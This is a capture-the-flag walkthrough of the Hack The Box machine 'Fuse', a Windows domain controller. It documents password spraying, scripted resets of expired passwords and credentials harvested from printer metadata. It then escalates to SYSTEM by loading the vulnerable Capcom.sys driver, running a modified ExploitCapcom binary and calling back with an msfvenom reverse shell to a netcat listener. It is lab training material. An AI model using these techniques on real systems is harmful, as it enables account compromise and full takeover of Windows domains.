Fuse HTB
IP
10.10.10.193initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.193 | cut -d"/" -f1 | tr '\n' ','results
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708Lets run a more in-depth scan of the target
sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708 -oA tcp_ports 10.10.10.193results
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open โ๏ฟฝh๏ฟฝ๏ฟฝU Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-07T23:37:32
|_ start_date: 2024-01-07T23:30:39
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds
what we can see
Most likely a domain controller given the presence of DNS, Kerberos, ldap etc
Windows server 2016
domain name:
fabricorp.localwe can add this to our hosts fileHosts name:
FUSE
Lets see if we can perform a zone transfer since Port 53 (DNS) is present
dig @10.10.10.193 fabricorp.local AXFRNo luck
Lets test for anonymous authentication among the services
SMB
crackmapexec smb 10.10.10.193 -u anonymous -p ''No luck
LDAP
ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC-local" "(ObjectClass=person)"
No luck
RPC
rpcclient -N -U anonymous 10.10.10.193No luck
Lets try the web Server
when we try to navigate to http://fabrcorp.local we are redirected to `http://fuse.fabricorp.local/papercut/logs/html/index.htm Lets add the subdomain fuse to our subdomain
when we do and try and access the page again we can see the following
Looking att the print logs we can see a couple of username's on the system
pmerton
tlavel
sthompson
bhult
administratorother then usernames i cant really find any other peices of interesting information, and we need a set of working creds to progress so we can utilise cewl to build a wordlist we could use with the usernames we have found
building a wordlist
cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers --depth 4 > pass_lists.txtNow we have a list of possible usernames Lets perform some password spraying via smb
crackmapexec smb 10.10.10.193 -u usernames.txt -p pass_lists.txtwe do see something interesting
we have
tlavel:Fabricorp01
bhult:Fabricorp01But looks like the passwords have expired
tried to authenticate to a few services, but no luck
if we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE , meaning we do have valid credentials but they are expired, we could try and reset the password using a tool like smbpasswd
impacket-smbpasswd fabricorp/tlavel:Fabricorp01@10.10.10.193 -newpass shrek123!Now we just need to create a password that matches the Password complexity
shrek123!It seems the password expires after 1 minute from creation, wat we can do is write a basic python script that will automate the password change process
import subprocess
import random
import string
def gen_password(length=9):
chars = string.ascii_letters + string.digits + string.punctuation
password = ''.join(random.choice(chars) for i in range(length))
return password
def escape_password(password):
# Escape special characters in the password
return password.replace('"', r'\"').replace("'", r"\'")
def Grabitall():
new_password = gen_password()
escaped_pass = escape_password(new_password)
change_pass = [
'/usr/bin/impacket-smbpasswd',
'fabricorp/tlavel:Fabricorp01@10.10.10.193',
'-newpass',
escaped_pass
]
try:
#running the command
result = subprocess.run(change_pass, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
#checking if trhe command was successful (exit code is zero)
if result.returncode == 0:
print(f"{new_password}")
else:
print("Password change failed")
print(f'Command output {result.stderr}')
except subprocess.CalledProcessError as e:
print(f'the following error has occured {e}')
print(f"Command output {result.stderr}")
Grabitall()Now that we have our automation script, we can continue enumerating
Lets list all the shares
Lets create a new password
./smbpasswd.py
Now lets use crackmapexec to list all the shares
crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' --sharesfor good measures we will also use the spider_plus module and see if we can find anything interesting
crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' -M spider_plusNothing to interesting within smb so lets head over to rpc
rpcclient -U fabricorp/tlavel 10.10.10.193when we enumerate domain users we can see the following
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]Since within http it showed printing information a good place to start enumerating would be the printers
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]Looks like we could have a possible password
scan2docs: $fab@s3Rv1ce$1Looks like creds for the
HP-MFT01smb share
crackmapexec smb 10.10.10.193 -u scan2docs -p '$fab@s3Rv1ce$1'Doesnt authenticate
Lets perform some password spraying using the recently found usernames
first lets clean them up
sed -n 's/user:\[\(.*\)\] rid:.*/\1/p' usernames > cleaned_usernames.txtLets use crackmapexec to perform the password spraying
crackmapexec smb 10.10.10.193 -u cleaned_usernames.txt -p '$fab@s3Rv1ce$1'and we can see we have some valid creds
svc-print: $fab@s3Rv1ce$1 Lets list the shares we have access to
crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' --shares
Lets use the spider_plus module and see if we have access to anything interesting
crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' -M spider_plusnothing interesting
Lets see if we can winrm into the machine
evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'we have a shell on the system
Now we have a session on the target, Lets see if we can enumerate ldap with bloodhound-python and get some info on the system
bloodhound-python -c all -d fabricorp.local -u svc-print -p '$fab@s3Rv1ce$1' -ns 10.10.10.193Lets start neo4j
sudo neo4j consolelogin
start bloodhound
bloodhound --no-sandboxNow we can digest all the information we found using bloodhound-python
Dont really find much interesting
If we look within our current privileges on the machine we can see something interesting
we can see we have the SeLoadDrivePrivilege enabled for our current user
essentially allows us to place something in the kernel
How can we exploit this?
essentially since we have the
SeLoadDriverPrivilegewe are able to load a vulnerable driver, then exploit said driver this post explains this better
we can use the following vulnerable driver
Lets walk thorugh the steps needed to compile, load, and exploit the SeLoadDriverPrivilege
We will need to compile a few
.exefiles for the following attack, the best way to compile.exefiles would be in a Windows VM. To load the vulnerable drivercapcom.syswe will use the following tool from Tarlogic security https://github.com/TarlogicSecurity/EoPLoadDriver/
git clone https://github.com/TarlogicSecurity/EoPLoadDriver.gitAfter we have downloaded the tool (essentially a single c++ file) Let's start a new project in VS , at the window, we will choose the C++ Console App
Note: when creating a new project and specifying the project template "Console App" you may run into an error when creating the project, to fix this go to the visual studio installer
click 'Modify' and download the 'Desktop development with C++'
After this is installed we should be able to specify the Console App template without error
alright back to compiling the
eopladdriver.cpp
lets start a new project
click 'Next'
In the next window we can specify the name of our new project
here we can specify the name of the project (you can name it whatever you want)
Looking in the project we can see a basic hello world project
Now we can replace the code within
EoPloadDriver.cppcode below
after we have copy and paste the code, we can set the project to 'Release' and 'x64'
then we select 'Build' -> 'Build Solution'
Note: we receive and error with the line
include "stdafx.h"we can just remove it and it will build
now we should be able to see the .exe file within the specified file path
Now we can transfer this over to our linux machine
for this i will start a python HTTP server on my windows machine
python.exe -m http.server 80from our linux machine
wget http://<windows_ip>/EoPLoadDriver.exeNow we can upload it to the target machine
upload EoPLoadDriver.exeWe also need to upload the Capcom.sys
upload Capcom.sysNow that we have the vulnerable driver and the loader to the target machine, we can run same command we saw in the blog post
.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.syswe can see the following
it looks like it has worked no error, but we dont have the permissions if the driver is actually running
Next we need to build the actual exploit for our vulnerable driver, we can use the following code
Since this is a .sln file we will need to utilise visual studio on our windows machine, after we have cloned the repo we can simply double click on the ExploitCapcom.sln file
Lets build the project to see if an error occur before we modify the code
No errors, ready for us to modify the code slightly, if we look at the
LaunchShellfunction we can see the following
// Launches a command shell process
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
&ProcessInfo))
{
return false;
}
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return true;this just open a cmd prompt, but since we only have remote access to the machine this is pretty pointless, what we will do is generate a reverse-shell with msfvenom and drop that on the system, instead of the function executing
cmd.exewe are going to make it executeshrek123.exeour reverse-shell
so we want to change one line in the code
/ Launches a command shell process
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("C:\\ProgramData\\shrek123.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
&ProcessInfo))
{
return false;
}
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return true;Now we can build the
executablefile, just like what we did with the loader
Lets download this onto our linux host, same as before with a python http server
Lets generate our reverse-shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.22 LPORT=9001 -f exe -o shrek123.exeLets upload and start a listner
upload shrek123.exe
upload ExploitCapcom.exestart a listener
rlwrap -cAr nc -lvnp 9001Lets execute the exploit
note: may have to run the follwoing again before executing the exploit
.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sysLets execute the exploit
.\ExploitCapcom.exeif we check our listener we should have a shell
Last updated